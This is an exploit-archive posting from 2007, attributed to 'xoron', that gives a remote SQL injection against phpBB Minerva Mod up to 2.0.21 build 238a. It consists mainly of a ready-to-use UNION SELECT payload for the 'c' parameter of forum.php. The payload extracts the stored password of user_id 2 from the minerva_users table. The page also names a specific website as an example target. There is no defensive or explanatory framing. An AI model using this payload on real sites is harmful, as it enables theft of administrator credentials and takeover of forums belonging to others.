[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phpBB Minerva Mod <= 2.0.21 build 238a SQL Injection Vulnerability
# Published : 2007-03-19
# Author : xoron
# Previous Title : PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion Exploit
# Next Title : NetVios Portal (page.asp) Remote SQL Injection Vulnerability


======================X=O=R=O=N=====================
+
+ PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ forum.php ?c=-1/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/*
+
======================X=O=R=O=N=====================
+
+ Example: http://www.ayyquerico.com/Portal/
+
======================X=O=R=O=N=====================
+
+ Special thanx: ajann
+
======================X=O=R=O=N=====================

# www.Syue.com [2007-03-19]